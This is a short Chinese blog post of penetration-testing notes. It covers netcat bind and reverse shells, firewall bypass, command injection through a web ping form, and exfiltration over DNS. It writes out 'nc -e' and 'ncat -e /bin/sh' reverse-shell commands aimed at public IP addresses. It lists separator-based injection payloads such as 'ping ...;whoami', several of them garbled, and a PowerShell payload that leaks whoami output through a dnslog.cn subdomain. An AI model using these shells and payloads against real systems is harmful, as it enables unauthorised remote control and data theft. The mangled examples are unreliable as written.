美文网首页
实战经验

实战经验

作者: 笃笃木鱼 | 来源:发表于2025-10-09 11:10 被阅读0次
// Windows绑定CMD到本地5566端口
nc -e cmd lvp 5566
//Linux主动连接目标5566
ncat 47.122.23.131 5566
    • 2、反向连接:主动给出去控制权限/服务/能力,对方监听
//本地等待5566连接
nc -lvvp 5566
//受控方,给出权限到指定 IP:绑定CMD到目标5566端口
ncat -e /bin/sh 47.122.23.131 5566

//等待5566连接
ncat -lvvp 5566
//受控方,给出权限到指定 IP:绑定CMD到目标5566端口
nc -e cmd 47.94.236.117 5566

公网机器控制内网某一个机器的情况,只能使用反向连接

实际案例1:防火墙绕过-正向连接&反向连接&内网服务器

有一个网页,对应服务器是 windows 且可以输入 ip 地址并回显 ping


image.png

管道符:|(管道符号)1(逻辑或)&&(逻辑与)&(后台任务符号)
Windows->|& &&、'(特有`和;)
Linux->;||| & &&
例子:
ping-c1127.0.0.1;whoami
ping -c1127.0.0.1| whoami
ping -c1127.0.0.1l whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1127.0.0.1 && whoami
ping -c 1 127.0.0.1whoami

  • 该方法受防火墙的出站入站规则影响
  • 数据不回显的情况
    使用dnslog 工具,让对方把结果放在ping 的域名前缀中,dnslog 工具提供 ping 的域名和 dns 查询记录;
// 语句示例
127.0.0.1| powershell $x=whoami;$x=$x.Replace("',’xxx');$y='.vpod5d.dnslog.cn';$z=$x+$y;ping $z

相关文章

网友评论

      本文标题:实战经验

      本文链接:https://www.haomeiwen.com/subject/trretstx.html